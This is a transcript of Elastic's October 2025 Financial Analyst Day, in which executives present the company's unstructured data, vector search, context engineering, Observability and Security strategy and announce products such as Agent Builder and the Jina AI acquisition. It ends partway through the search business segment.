Elastic N.V. (ESTC)
NYSE: ESTC · Real-Time Price · USD
47.83
+1.43 (3.08%)
At close: Apr 27, 2026, 4:00 PM EDT
48.76
+0.93 (1.94%)
After-hours: Apr 27, 2026, 7:58 PM EDT
← View all transcripts

Financial Analyst Day

Oct 9, 2025

Eric Prengel
Global VP of Finance, Elastic

All right. Hello, everybody. Welcome to Financial Analyst Day. Now, before we begin, I want to get the obligatory disclaimer language out of the way. Today's event will be webcast and recorded for future playback. Information and risks pertaining to forward-looking statements, as well as reconciliation to our GAAP and non-GAAP results, are available in today's presentation materials, which will be posted on the investor website at ir.elastic.co at the conclusion of the event. With that out of the way, onto the fun stuff. For those of you who don't know me, my name is Eric Prengel, and I'm the Global Vice President of Elastic, as well as the Head of Investor Relations. I was an investment banker for a long time before joining the company almost three years ago.

I've known Elastic for a while because I worked on the IPO, and some of you worked on it with me. It was a lot of fun. Since joining, I've gotten to know the company a lot better, and I'm really looking forward to sharing with all of you what the team has built and all of the exciting things that we have in the trajectory that we're on. It's great to have so many familiar faces together, and all in the place I grew up in, LA. Ash mentioned the Yankees. I went to the game last night. It was sad to see the loss, but they'll be next year. We have a great program for you today. Ash is going to lead off and go through the opportunity. Ken, Steve, and Santosh are going to talk about product.

Mark is going to talk about go-to-market, and Navam is going to talk through the financials of the business. Unfortunately, Shay couldn't be here with us today due to a family health issue that he needed to attend to. He's regularly at Elastic{ON} events, and actually, if any of you are able to make it out to Amsterdam on October 30th, he will definitely be there. With that, I'm very excited to hand it off to our CEO, Ash Kulkarni.

Ash Kulkarni
CEO, Elastic

All right. Good afternoon, everybody. Thank you for joining us today. I'm going to kick things off. My job today is to set the stage, talk about our strategy, our vision, who we are as a company.

For those of you who might not be that familiar with Elastic, I want to make sure that you have a firm understanding of where we differentiate, the role that we play in the IT organizations of all of our customers, the opportunity that we have in AI, how we are helping customers in AI today, and what that means for our future. The rest of the agenda is going to be folks in products walking through the new product capabilities. We had six new product announcements today. We are going to have Mark talk about our go-to-market efforts and everything that we have done there, and finally, Navam bringing it home. With that, let's get started. The most important thing that you need to understand about Elastic is the role that we play in helping our customers deal with unstructured data.

We are the world's most popular data platform when it comes to unstructured data. Oftentimes when people say unstructured data, it's hard to know exactly what you mean by that. Take a look at a log file. A log file is effectively every developer putting notes for them in the future to be able to go back and debug their own code. Typically, these messages tend to be very, very freeform. They tend to be very, very messy. The information in there is different from line to line. When you look at a log file like this, you can't put it into a regular database. It doesn't matter if it's a SQL database, it doesn't matter if it's a document database, it doesn't matter if it's a columnar store. You can't put this information into a rigid schema.

By definition, if you're looking for patterns in it, if you're trying to identify and sift through it, analyze it, you need a different paradigm. You need a search platform. That same thing applies even when you're dealing with freeform documents, Word documents, PDFs, all of these kinds of structures. They do not have a good schema. That's unstructured data. Because of our dominance in this area today, over the years, we've had over 5.5 billion downloads of our software. That's over three downloads a second over these 15 years, if you average it out. We have been ranked as the number one search engine and vector database according to DB- Engines. If you look at the GitHub Stars, it clearly indicates the popularity that we have.

All of this is because, yes, we can deal with structured data, but most importantly, what we can do with unstructured data, with the power of relevance, that is something that is very specifically our greatest competitive advantage. Because of this, we have built a tremendous incumbency when it comes to this kind of information. We have estimated just the data that is in Elastic Cloud that we have a lot of clear access to and visibility into, but also our estimates of the data that exists in paid Elasticsearch self-managed clusters around the globe. Every day, over 30 PB of new data gets ingested into Elastic paid clusters around the globe. 30 billion queries per day just on Elastic Cloud. When we look at the total data that's under storage, it's well over 1.3 EB. That is incumbency.

This is unstructured data, and when that unstructured data gets utilized for AI, gets utilized for Observability, for Security, where do you expect people would go? The first place that they go is Elasticsearch. This data is already there. When they look to automate things using new modern AI techniques, we are the natural platform of choice. This incumbency is a huge advantage. As unstructured data has grown, so has our revenue. We have built a strong at-scale business. As unstructured data, which is the fastest growing type of data, has continued to expand, the most exciting thing that's happened is the fact that with the advent of LLMs, the importance of unstructured data has just grown manifold. You look at any application in the past, whether it was CRM systems, ERP applications, HCM systems, they were all built on structured information. Account ID, opportunity ID, customer name, etc.

All the notes that you put into your CRM system are just shoved in there. It's freeform text that you can't really analyze in any way. It's just an attachment that some human being has to read. Large language models have completely changed what you can do with unstructured data. Large language models are really the new operating system. We believe it. We believe it firmly. You program not using Java or C or Rust or Python, but you program using English. That's the amazing part about these systems. These systems are knowledge systems, but they are only as knowledgeable as the data they've been trained on. To use them within the enterprise, you have to provide them with context. You have to provide them with relevant data to be able to address the problem that they're trying to address.

AI fundamentally depends on data, being able to have access to it, and relevance is key to making any AI system actually worthy, production-grade. This is right in our wheelhouse. AI has literally come to us. It has made unstructured data more interesting, more valuable. Our ability, this is what we've always been known for. This is what we were created for as a company. Our ability to be able to ingest, bring in all of this unstructured information, index it, make it searchable, allow you to run all kinds of interesting algorithms, ML queries on top of this data. This is what we have always been good at. This is what is really needed to build new AI experiences. We've been working on this ever since the company was formed. Relevance is not a new concept for us. From the earliest days, it was all about relevance.

It was all about trying to figure out how to make sure that you can surface the most relevant information for the search query that you were firing at Elasticsearch and surface that. Over the years, we continued investing in machine learning, in AI. When it was clear that transformer models were going to be an interesting thing, we started investing in building out our vector database well over five years ago. Since then, we have made our vector database more and more capable, highly scalable. Today, we have customers that are using it to store and retrieve billions of vectors at scale in a very high-performance way with great efficiency. We built our own embedding and retrieval models. We built our own re-ranking models. We added additional capabilities like MCP tools. We are working on GPU-based acceleration with NVIDIA.

There's a lot that we have been doing in this area. This is not something that we just woke up and decided to do a year ago. This has been in the making because unstructured data has been at the core of what we've always done. Today, we feel confident that we have the best platform for context engineering. Now, what is context engineering? If you ask ChatGPT, which is what you should do, it'll tell you that context engineering is the techniques involved in ensuring that you provide the right data and the right tools to a large language model to allow it to do its job accurately. The right data and the right tools. That takes more than just a vector database. Of course, you need a vector database when you're dealing with data that might not easily be searched through textual techniques.

Also, if you want to do things like semantic search, but you need more than just a vector database. You need to be able to deliver hybrid search. You need to be able to ensure that you can actually verify the outputs. Have a playground. You need LLM Observability. You need embedding models that you're constantly tuning and improving relevance with. All of this becomes critical. Why do we win? We win today because of these three broad reasons. First and foremost, like I said, we have been investing a lot in making our vector database and our overall retrieval platform the absolute best when it comes to speed, scale, and efficiency. I'll talk a little bit more about that, but more importantly, the team's going to go into it and actually go into the details.

In the past, we've talked about things like better binary quantization, BBQ, which allows you to manage vectors in a much denser way. You're having to use much less memory and CPU. We've talked about capabilities like ACORN, a new filtering algorithm that allows us to improve query performance because any search always happens with some amount of filtering. You don't search for restaurants, you search for restaurants in a particular neighborhood. In a particular neighborhood is a filter. You need to be able to do that efficiently. That's what we do incredibly well. The second reason why we win is relevance. We have put a lot of effort and energy into optimizing our models for relevance.

We don't just do this using vector search, but with the re-rankers that we've built, the ability to use multiple techniques, hybrid search, semantic search, and then on top of it, to use re-ranking to get the best possible output, the most relevant data. Lastly, because we have assembled all of the tooling that you need to be able to build these chatbots, these agentic workflows, these agents in an efficient manner. Today morning, we made two announcements in this area. The first is a new capability called Agent Builder, and the team's going to demonstrate this. You know, if data is the most important aspect for context, wouldn't you want to start with the data as you're building these agents?

How do you start directly on top of your data with almost a conversational experience, explore your data, and assemble the right tools that you need to quickly build a complete agent with workflow capabilities and everything that is needed? A completely different approach that's truly relevance-centric, that's all about context engineering. The second thing that we announced is the Elastic Inference Service. This is our own GPU-accelerated service in Elastic Cloud where we make it possible for our users to get access to our embedding models, our retrieval models, our re-ranking models, and over time, more and more models that we'll deliver. You have everything that you need, not just for Agent Builder, but even outside of it, through this easy API. We also, today morning, announced our acquisition of Jina AI. We have been partnering with Jina for a long time.

Our ELSER model is a world-class sparse encoded model, but it was English only. With Jina, we get access to an amazing multilingual and, most importantly, multimodal set of models, both for retrieval as well as re-ranking. When you look at any document, most documents will often have multiple types of information in it. Some text, but also images. If you are dealing with a single-mode model, you would need to break up that information, separate the text from the images, run it through two separate models, to chunk it up differently. It just makes the whole system extremely complicated, and you don't get the relevance, the accuracy that you need. With a multimodal approach, like what Jina has been able to do, you can put all of that information through a single model and get exactly what you need.

This is going to be available through our inference service and will be available to our customers as we integrate this. This team, the team of researchers, the work that they have done, they have made it, you know, they do a lot of work with academia. They've published a lot of reports about the relevance quality that they're able to generate. We are very excited about what this brings to Elastic. This is allowing us to win the kinds of customers and have the kinds of customer successes that we are incredibly proud of. I wanted to just talk about a few of these examples. The first is Docusign. The reason they chose Elastic was because they were trying to build what they call their intelligent agreement management platform, a new service that they're delivering to their customers. They want to go beyond just being able to sign documents.

For that to work, they needed to have some ability to be able to search across each and every document, literally many, many billions of documents that are in the Docusign store. How do you make that possible across the different modes of data like we talked about, at scale with immense relevance? We were the only ones in their testing that they found capable of doing it. Legora, an AI-native company, it's all about how do you use AI to improve the process by which lawyers are able to do research on case law, write drafts, optimize those drafts, do their work better and faster. They chose us because of the quality of relevance. When you're dealing with legal case law, the kinds of semantics involved are very specific. You need to understand those semantics. They found that the relevance quality that we were able to deliver was amazing.

Another example I'll touch upon is the National Health Service in the U.K. They use Elastic as the platform for bringing in all of their patient records and being able to search across them for helping doctors decide what's the best next step in terms of the procedures that they want to recommend, helping their doctors work faster, more efficiently. They chose Elastic not just because of our scale, not just because of our relevance, but also because we were the only platform that had the very fine-grained document-level permissions that gave them the confidence that it would not violate patient privacy rights. We are the only platform that has the ability to do all of this. What's interesting when I look at this slide is, first, the variety of customers. We are not looking at just customers that are AI-native companies. Looking at ISVs like Docusign and Seismic.

Looking at agencies like the National Health Service. That breadth is what gives us tremendous strength. This is diversified. The second thing that I'll call out is these use cases are very durable use cases. This is not experimentation. The National Health Service is not trying to experiment with people's health. You know, Legora, their whole business model is built on this. Docusign, the entire new business that they created, is dependent on this. These aren't experiments. These are durable use cases. The last thing I'll call out is just the fact that they had a very clear understanding of the differentiation and the competitive advantages that Elasticsearch has that made us the only right choice for their needs: scale, relevance, and the ability to do everything in one single platform. You look at the numbers of customers that we have today. You know, I look at that middle box.

That represents about 20% of our customers in the cohort that is paying us over $100,000 a year. That's 20%. That tells me two things. One, that there is a tremendous opportunity still ahead of us because we still have 80% of that population to go after. Second, that each of these companies, even the companies listed here, they have built one really amazing application on our platform that's AI-centric. That's just the first. There's so much more that they are planning to do, intending to do, and we are in such a great place as part of their infrastructure for AI that we feel very excited about what this means for the future. Now, I'm going to shift gears a little bit. Everything that I've talked about so far has been about search. What does this mean to our Observability business?

First, why did we even get into Observability as a company? I'll take you back to what I started with. We are the best data store for unstructured, messy data. Observability data tends to be incredibly messy. Logs are the messiest form of machine-generated information. Our ability to get into this entire space started with the functionality that we delivered in log analytics. Over the years, we've assembled a complete platform, everything from infrastructure monitoring, APM, AI Ops, real user monitoring, and more. The reason why we win today are these three. The first thing is very simply what you see at the bottom. We have the best data store, and we continue to invest in this.

We have the best data store capable of ingesting every possible type of signal needed for Observability in one single store, allowing you to run complex correlations, allowing you to see the links between, you know, the infrastructure showing you that the CPU is running hot, to understanding the specific services and application components that might be falling behind, to then getting to the relevant logs, the specific logs related to those issues, to then be able to diagnose the root cause. Having one data store that's optimized, and we have built distinct backend specialized stores within Elasticsearch for logs, for time series data like metrics, and so on. We can store each of these data types efficiently and still get you correlations across all of it using a singular query language, ES|QL. The second reason why we win is because of our big bet on open standards.

Observability is a mess, generally because of the fact that in the past, none of the data was ever normalized. It was really hard to do any kind of correlation. OpenTelemetry has started to change that in a very material way, in a very material way. We leaned in hard because with the open standards that OpenTelemetry provides, we can now have an OTel native way all the way from collecting data with OTel collectors and OTel SDKs, all the way to an OTel native backend schema. Incidentally, we donated our Elastic Common Schema to the OpenTelemetry project, and their common schema for logs is based directly off of Elastic's common schema. What that means for our customers is when they use OTel to bring in the data, the dashboards automatically light up. The data is naturally correlated with each other. That is a huge advantage.

Lastly, because we have been more aggressively using AI to help with investigations when you are dealing with any kind of issue in Observability than anybody else. When you're dealing with Observability, the thing that matters most is mean time to detection, mean time to resolution. How quickly can you spot the problem? How quickly can you understand the root cause? How quickly can you do something about it? Towards that end, the fourth big announcement that we made earlier today was something called Streams & Significant Events, and the team will demonstrate this. Using AI to automatically help you get all the richness and all the information that exists in logs because logs have always been the last port of call. That's where every developer goes at the end when they want to root cause exactly what line in their code is causing issues.

It has never been the first port of call because logs are hard to work with. They require you to do a lot of work. You have to write a lot of grok rules. You have to parse the data. You have to bring it in. You got to write the right alerts. What if AI could do all of that for you? That is what Streams & Significant Events does. It automatically uncovers what's important in your log data. Our customers are showing with their faith in us that our approach is the right approach. We've talked a lot in the past about our land and expand strategy. This just gives you a sense of how much progress we've made even within the subcomponents of Observability. We always start with log analytics. Over 90% of our Elastic Cloud observability customers use us for log analytics.

What most people might not realize is over 35% of our Cloud observability customers use us for what I describe as beyond logs, APM, infrastructure monitoring or metrics, AIO ps, and so on. This shows that our land and expand motion is working. It's proven. There is also a lot more room for us to keep growing. This is what's exciting for us. That same approach also applies to Security because if Observability is a data problem, Security is 10 times more. You literally miss every single threat in the data that you don't ingest, analyze, and alert off of. Security is absolutely a data problem. That's why we started with SIEM because we have the world's best platform for unstructured data. All of that Security telemetry is unstructured. It's network logs. It's application logs. It's identity and access management logs. It's web logs. It's telemetry from endpoints.

It is in so many different shapes and sizes. Being able to bring it all together and actually do analytics on it is a data problem. Yes, we've invested a lot in first-party threat research and so on. Make no mistake, Security is fundamentally a data problem. By starting with SIEM, we then, over time, have expanded beyond, adding EDR and XDR functionality, adding cloud detection and response functionality, adding UEBA or entity analytics. The reason why we win, and you'll see that the themes here, first and foremost at the bottom, the best SIEM data store when it comes to being able to bring in all of this network telemetry at speed, at scale, very flexibly, irrespective of your deployment type, in the cloud, on-prem, do threat hunting across all of your data.

The second reason, we have truly used AI more aggressively in Security than anyone else. Attack Discovery, the functionality that we released a year and a half ago, which is now being used very widely across our entire Security portfolio by our customers, takes away the job of an analyst to try and sift through all of the alerts and figure out what are the real attack patterns in there. The AI does it for you. The third reason, the ability to not just unify all of the signals, but then to act on it, to remediate. I'm going to touch upon that in a second. The fifth big product announcement that we made earlier today was this. We announced Elastic Workflows. This was the acquisition of Keep that we made about six or seven months ago. We have very quickly integrated that functionality directly into the platform.

Now, not only do you get security alerts, not only can you do threat hunting in the platform, but you can create the remediation workflows. Depending upon how automated or semi-automated a way you want to actually do those remediations in, you can fire off those remediations. Complete case management, complete workflows, stateful, everything. Incredibly powerful. Our customers are proving that we are the right choice. Over 95% of our Elastic Cloud Security customers use us for SIEM. This is where we land. Just like in Observability, we land with log analytics. In Security, we land with SIEM. What most people might not realize is that over 20% of these Elastic Cloud Security customers are using us for what I call beyond SIEM. They are using us for EDR and XDR use cases. We do not lead with EDR, but we expand with EDR when we are in.

Those endpoints that are bringing in the data required for SIEM have the functionality built in for things like ransomware protection, for things like host isolation. Once that agent is deployed, all the customer needs to do is turn on the configuration flag. That is how we expand. That is how we grow our consumption. I have talked about land and expand over and over again. I will try and put it in a visual form for all of you. What is great about Elastic is, given that we have had such strong roots in open source, it is really hard for me to meet a prospect, somebody who has never done business with us, where there is not somebody who is already familiar with Elasticsearch, is actively using Elasticsearch. Maybe the community edition, the free edition, that is fine. They already know us. They are already champions in there.

Awareness starts through our open-source roots. When we land, when we have the first transaction with a customer, it happens in one of two ways. Either the self-service motion, if it is an SMB customer, they just come to monthly cloud and they start using us that way. It is typical for our SMB cohort. Our sales-led efforts, where we go after the enterprise and mid-market accounts. After we have that first land, we focus on customer usage. Mark will touch upon this. We have a customer architect team that focuses just on this. They are engineers who work with our customers to make them successful with that implementation. When that implementation is successful, consumption starts to fly, the flywheel spins. Because as they do that, the next natural thing then with the customer is a conversation about how else can we help you.

Just as I talked about beyond logs, beyond SIEM, and then going from one solution to an additional solution. That's how we grow. Customers adopt higher tiers if they want our AI Assistant, if they want s earchable snapshots, these capabilities that we put in the premium enterprise tier, and on and on. Another thing that's important about Elastic is the fact that we have been very disciplined about making sure that we meet our customer where they want us to be. We have, of course, Elastic Cloud Hosted and Elastic Cloud Serverless, but also the self-managed offering. That gives us tremendous advantages. There are lots of customers, even today, who want to run AI workloads in their own data centers because the data is regulated information that they don't want to put in cloud. That gives us an asymmetric advantage.

We're one of the few that can do this. All of this taken together is setting us up, has set us up in such a great way in a market that has a massive total addressable market. We are very excited about this. We can see the recognition that we've been getting and earning from analysts. In the most recent reports, we are now a leader in each of the areas that we play in, according to Gartner and Forrester. We didn't have this five, six years ago. We still have so much headroom ahead of us. That box on the bottom right, I always think about that. We have over 50% of the Fortune 500 companies as customers. That means there's 50% more that we can go and get. That is exactly what Mark and his team are focused on from a go-to-market motion.

The work that they have done in the last 18 months, transforming our execution, making it more predictable, making it more consistent, is something that I'm very, very excited about. What I'm most excited about is the fact that as we've been able to improve our efficiency, improve our productivity, we are very confident that even as this engine is humming, there is still more room for optimization. I know that we can continue to do even better. That's exciting. I'm going to bring it home. You know, we are not chasing AI hype. AI is really a wave that has come to us because of the role that we've always played with unstructured data. That's what our customers know us for. That unstructured data has now become incredibly exciting and important. It is what's fueling a lot of the work that's going on in AI.

That just means that we have a natural seat at the table. That just means that we have a natural advantage, an incumbency that we are taking advantage of. If I leave you with these five pillars, I think that's the most important way to think about Elastic. We are trusted by developers all over the globe. We are trusted by enterprises. We have clear Gen AI leadership. Analyst recognition is only helping us do this more efficiently with our go-to-market motion. Lastly, we've been able to consistently deliver strong financial performance. I'm going to hand it over to Ken to really take us through the products. Ken.

Ken Exner
Chief Product Officer, Elastic

Hey, folks. Thank you for being here. I get to do what I love now, which is talk about products. I'm going to begin with a point that Ash made earlier. Ash was talking about the explosion of data that we're seeing, especially unstructured data. This is something I see all the time when I talk to customers. They're talking about how much data they have, how hard it is to manage it, how much that data is growing all the time. It's not just the volume, the amount of data that they're struggling with. It's also that it's siloed across the enterprise in a mix of structured and unstructured formats. Even when it's structured, it tends to be different schemas. They're dealing with all this messy, siloed data. They also know that in the age of AI, this data, this unstructured, messy data suddenly has new value.

If they could put it to work, if they could use this together with generative AI and agentic AI systems, this new, messy, unstructured, siloed data has new value. How do they do that? Enter Elastic and the Elasticsearch platform. For years, we've been helping customers get more value out of data. No matter how messy that data is, no matter how siloed, no matter what type of data it is, we help customers get value out of data. In the age of AI, to build these AI experiences on top of that data. In a few minutes, Steve and Santosh are going to walk you through the search AI, Observability, and Security businesses that build on top of this platform. I want to talk about the platform itself, the Elasticsearch platform, because I think that is why we win. Very simply, we win because of the Elasticsearch platform. Period.

For me, this means three things, though. One, it's a world-class data store. It's a blazing-fast data store. It is highly performant. It is highly scalable. Customers always know us for being the search engine, but they sometimes forget that we're also a data store. I would argue not just any data store, but the best data store for unstructured data. Second, we're the leader in relevance. As a search engine, as a vector database, as a context engineering solution, we excel at relevance. We're the leader in relevance. No one has a deeper set of capabilities than us for getting relevant context out of data and presenting that context to other systems. No one has more customers. No one has been doing this longer than us. We are the leaders in relevance. Third, we win because we win with developers.

We are loved by, and we are built for, developers. Developers worldwide, millions of developers have used Elasticsearch over the last 15 years. We have deep roots in open source. Because of these deep roots in open source, we've built out a huge community that takes Elasticsearch into the enterprise where we're able to convert into paying customers. Let's unpack this a little bit, beginning with why we win as a data store. It starts by supporting all the data. It doesn't matter what kind of data it is. The Elasticsearch data store supports everything. It could be metrics, traces, IoT data, product telemetry, or business data. Any type of data, structured or unstructured, we support that.

One of the things I think that is really, really unique about us is that we support the type of capabilities that are only typically supported by structured data stores, but for unstructured data. Let me give you an example of what that means. It means that we can combine all this data together, even though it is not the same format, not the same schema, even if it's different types of data, even if it's unstructured. We can do things that are typically only possible with structured data tools. For example, you can join data. Using ES|QL, our query language, you can actually literally do joins on two different data sets that are not only different schemas, but are unstructured. You can create fields on the fly. You can do math operations on unstructured data. You can do sorting and filtering.

These are things that are typically not done with unstructured data, but you can do that with the Elasticsearch platform. If you want to run ML jobs or AI or various types of analytics on this, it doesn't matter that the data is all kinds of different formats. It doesn't matter if it's unstructured. You can run that across this. You can run correlation analysis. You can run anomaly detection, not just on metrics and traces, but also on business data. No one else can do this. It's not just that we support any type of data that makes us a special world-class data store. It is also because we have a reputation for being incredibly fast, highly scalable, and highly performant. It's not a reputation that we take for granted. We are constantly reinvesting and making sure we are highly efficient and highly performant and highly scalable.

Typically, there are two types of investments we make. Sometimes they're data-type specific. We have types of improvements that we do to make logs really great on Elastic, to make metrics or vectors really great. For example, over the past year, we introduced LogsDB and TSDB. Both of these improvements are delivering 70% storage efficiency for our customers over previous versions. We've also been doing a lot of work in vectors. Ash mentioned BBQ, better binary quantization, my favorite product name. It is a type of compression for vectors. What it does is it allows customers to have huge savings in terms of memory footprint and in terms of storage. You get 95% efficiencies in terms of memory. Not just that, it also improves performance. It's actually made us five times faster than OpenSearch with their default quantization techniques.

Sometimes the improvements that we do on our data store affect all data in Elastic. For example, the work that we're doing with NVIDIA to do GPU acceleration of all data in Elastic, or the work that we've done on a data lake architecture. Over the last few years, we introduced a new data lake architecture. It's built on object storage like other data lakes. Unlike other data lakes, you don't have to compromise performance. We are the only data store that allows you to have blazing-fast performance, real-time performance. You can build real-time applications, latency-sensitive applications on top of our data lake. You get the durability of object storage. You get the scalability. You get the efficiency of object storage. You don't have to compromise performance. Only we can do that. You can't talk about Elastic without talking about search. You can't talk about search without talking about relevance.

We are the leader in relevance. We're especially good when it comes to finding context and intelligence in any data, no matter whether it's structured or unstructured. If you have structured data, like you have a table or a relational database, there are plenty of good tools that you can use to query that data. If you have unstructured data, what do you do? For example, if you have petabytes of logs, those logs might be different schemas. Even if it's the same schema, that same schema is going to have a mix of structured and unstructured content. How do you sift through that? How do you find that needle in the haystack that could end up being a security vulnerability? You need a great search engine.

If you have a huge repository of documents or PDFs, like what our customer Docusign has, and you want to do semantic search on that, or you want to build generative AI applications on top of that, how do you do that? These documents usually are opaque documents. Even if it's not opaque, it's usually a mix of structured and unstructured formats. What you need is a vector database. You need a semantic search system. You need a retrieval system, a great retrieval system. What makes a great search engine? What makes a great retrieval system? It's relevance. Relevance is at the heart of doing search and retrieval right. Relevance has always mattered, but I think it matters even more in the age of AI. Back when we were mostly focused on returning results to a user, like 10 blue links, you didn't want bad search results, right?

You wanted good search results. There's a human there that can interpret those results, so you had room for error. In the age of AI, you're not going to get 10 results. You're not going to get 100 results. You're going to ask a question of an LLM or an agent, and you're going to get one answer. Hopefully, that one answer is right. For it to be right, that agent, that LLM has to be grounded in the right data, has to have the right context. It gets even more interesting and more worrisome when you get into agentic AI. When you get into agentic AI, now it's not just answering a question. Now that AI, now that agent is performing an action. It's doing a task and potentially doing it badly.

The consequence of not grounding that LLM or that agent, not giving it the right context, could be destructive, could be damaging. This is why I think relevance matters so much in the age of AI, why context engineering as a concept is going to be talked about constantly as people move forward with agentic AI, because it's all about having relevance. It's all about having context. That's what you need to do AI correctly. The vector database companies have been saying that the answer to this problem is a vector database, and it is to an extent. I'm saying this as a vector database company. You know, we were one of the first vector databases out there. We are the most downloaded vector database. We are the best vector database. I also know that vectors are not enough. Vectors are not enough.

It is not enough to simply store and query vector embeddings. You have to do a lot more. For one, you have to help customers prep data and ingest data. They're going to have all kinds of different data stores that you're going to need to help integrate, pull data from different places. You're going to have to parse that data. You're going to have to figure out a chunking strategy for how you're going to chunk that in order to create the vector embeddings. To create vector embeddings, you're going to need a model, an embedding model. Hopefully, it's not just a single language embedding model, but maybe a multilingual embedding model, maybe a multimodal embedding model. It doesn't stop there. Because now you need to work on retrieval.

One of the things that we have learned is that to get relevance right, you have to combine different techniques here. It is not enough to just do vector search. You're usually combining vector search and lexical search, or doing graph traversal, or you're doing geospatial search, or filtering and faceting, like Ash talked about. If you're combining different data sets, you're going to need to do re-ranking using a re-rank model. These are all the different techniques that you use for tuning relevance. If you're going to tune relevance, you're going to need a way to evaluate results and make sure that you're getting the right results from that tuning of relevance. How do you do that? You need to have A/B testing. You need to have a framework for doing this evaluation. You're going to want to take this application to production.

You're going to need to monitor that application. You're going to need to have query logging and metrics and tracing for that application. You're going to need to make sure that you're doing cost and token tracking. It doesn't stop there, though. We're in the age of agentic AI. The patterns change a little bit. Previously, you just focused on passing the right data to an LLM in its context window. In an agentic architecture, you're doing things differently. Now what you're doing is you're exposing that data as an MCP tool to an agent or to an LLM. You're helping with tool selection. Now you need a whole new set of things. You need to have prompt management. You need to have memory management. You need to have a set of capabilities for building MCP tools. You need to have capabilities for helping the LLM do a tool selection.

There are a lot more things that you need to do. All of this is context engineering. This is a term that you're going to hear a lot over the next couple of years. Context engineering is vital to doing agentic AI right. It's not a term that we invented. It is something that's used popularly in the industry. We did pioneer a lot of the capabilities in this space. We did trailblaze a lot of the technologies here because, you see, we do all of this. Steve is going to show you many of the capabilities, especially the agentic AI capabilities that we've been working on. I just want to make sure that it's clear. We didn't pivot recently to doing this. As Ash pointed out, we've been doing this all along because context engineering is all about relevance. We are the leaders in relevance.

It is in our DNA. I believe that we were made for this moment. Finally, we win because we win with developers. We have, over the last 15 years, built a community of millions of developers that know and use Elasticsearch. According to the annual Stack Overflow survey, 17% of all professional developers in the past year have used or built on Elasticsearch. 19% of all AI developers worldwide use Elasticsearch. A lot of this is because of our reputation in open source. As Ash pointed out, we've been downloaded 5.5 billion times, which makes us one of the most popular open source projects of all time. The other thing developers love about us is that we continue to expand our platform, offering additional capabilities all the time. They make it possible for our customers, our developers, to build amazing things on top of our platform.

Over the years, I've been amazed at what people have built. They've built all the ride-sharing applications built on Elasticsearch, matchmaking sites built on Elasticsearch, fraud detection systems, signal intelligence systems, all these things built on Elasticsearch. Three of the most popular use cases have been in search AI, Observability, and Security. To make it possible for our customers to get up and going, get up and running using us in these three scenarios, we created out-of-the-box solutions that make it possible for them to get started immediately using us as an Observability platform, using us immediately as a Security platform, and for search AI. With that, I want to turn the stage over to Steve and Santosh, who are going to walk us through these three solutions and these three businesses, beginning with Steve Kearns.

Steve Kearns
Group VP and General Manager of Search, Elastic

Thank you. Nice work. Great job.

All right. Hi, everyone. I'm Steve Kearns. I'm the GM of the search business here at Elastic. I've been with the company for 11 years. I've lived through this time where Ash and Ken are saying we've always been a search company. Relevance has always been at our heart. I can tell you it's true. It's really been fun to see the excitement, the interest around generative AI, and how central relevance is to success in those applications and in those use cases. When you think about the kinds of use cases that people run on top of Elasticsearch, you can think about search-powered applications. For the entire history of the company, we've been a great data store, a great platform for engineers to build compelling, engaging experiences for their customers.

In fact, I bet a number of you here today, I don't know, looked up a coffee shop, might have placed an order. You might have then filed an expense report. All of those kinds of applications, those things are built on top of Elasticsearch. I bet many of you experienced Elasticsearch in one way or another today as part of these experiences. People build on us because of the performance. They build on us because of the relevance. Just as importantly, because of the flexibility that we provide as a platform. When you bring data into Elasticsearch, all of the fields in that data are instantly queryable, by default, out of the box. That's a great experience for a developer. It's why so many applications continue to be built on top of Elasticsearch. As we see the excitement around AI, we're seeing these new workloads.

AI is driving the development of new experiences, often in response to new expectations from customers or from employees that are using AI tools at home, using AI tools in their personal life. They want that same experience in the business. When you think about these conversational experiences, and Ken talked about this really well, the conversational and agentic experiences, they depend so much more on getting the right business data, the right context, in order to give you the right answers. If you think about what does it take in AI to get that right answer, they're great. Language models have wonderful world knowledge. They don't know about your business. They don't know about your job. They don't know what problem you are trying to solve.

The job then that we have to do on the data store side is to get the right context, the right information from your business to the model to help you with your task at hand. This is really important with conversational AI, just asking a question. If it doesn't give you the right answer, users are going to lose trust in that system very quickly. It's even more important, as Ken said, when these systems start to take action on your behalf, the agentic workflows, and they're taking action, they're changing things in your business, it has to do the right thing. It has to have that right information to make those decisions and make those choices. We really believe very strongly that relevance is at the heart of every successful AI implementation, every successful AI project.

It's no surprise then that the core of why we win is all around relevance. Ken talked about all the features, all the capabilities that we've added into the platform. When you think about relevance, it's not about one feature. It's not like, yes, we added one new feature, done. Relevance is solved. Relevance is really personal. It's about what's the data that you have available? What's the information need that the user has? What are they trying to do? Do we have the information available to help them with that? Relevance is about flexibility, the flexibility that we have as a platform to retrieve the right data, to give you the tools, because sometimes you're looking for one right answer. I have, what's the document that contains the answer to the question that I have? Sometimes I need to see a chart.

Sometimes I need to look at an outlier. Sometimes I need to find just one piece of information, but see how it compares to the rest of the population. What's one customer? How do they compare to the rest of my customers? This is a really important element around why we win, this flexibility that we have to get the right relevance. Another thing, Ken talked about a lot of the work that we've done around speed, scale, and relevance. This is really driving a lot of the places that we win. If you think about speed, e-commerce companies, a lot of the major e-commerce companies that we know and love are building their e-commerce search on top of Elasticsearch because they recognize that better search quality delivered faster leads to more business for them, right? You don't want to wait for your search to complete.

You don't want to get the wrong results. It makes a huge difference in the e-commerce space. We also see this on the scale side. We've got one customer, a document management customer in Elastic Cloud today, storing over 5 billion vectors in a single use case in Elastic Cloud. They're only able to do this because of the efficiency work that we've done. Ken talked about BBQ. It's a new thing actually being talked about, I think right now, in the other room called Disk BBQ, another order of magnitude efficiency in memory. This allows these multi-billion document use cases to be built at all and to be built on top of Elasticsearch. We really do focus on developers, right? Developers are the ones very often making the technology choices.

The better experience we can provide them, the more batteries included, the more we can provide out of the box to make this easy to get started, the better developers are going to find success building on top of us. One of the key things, and Ash touched on this at the beginning, one of the key aspects of relevance, right, is actually having the right models, the right language models to generate embeddings to power vector search. These language models are really important. I couldn't be more excited to have the Jina AI team joining Elastic. They're well known in the industry as a leading tier research organization, putting out incredible high accuracy, low resource usage, very efficient, very fast models. One of the things that I love about the team, the models are great. I'll talk about those in a minute.

I love the way that the team works. With every model that they release, they publish a research paper along with it. This has done a tremendous amount to help build the credibility in the market. The trust and the reputation that they have comes from the way that they work in the open. They make their models available on Hugging Face under an open- weights, but not open source license, so people can download it, advance the state of the art in research. When they want to use it commercially, they need a license. This is a wonderful model, very well aligned with how we operate our business as well. The models themselves are really exceptional. They've got a multilingual model that allows you to do same language and cross-language searching in over 100 languages.

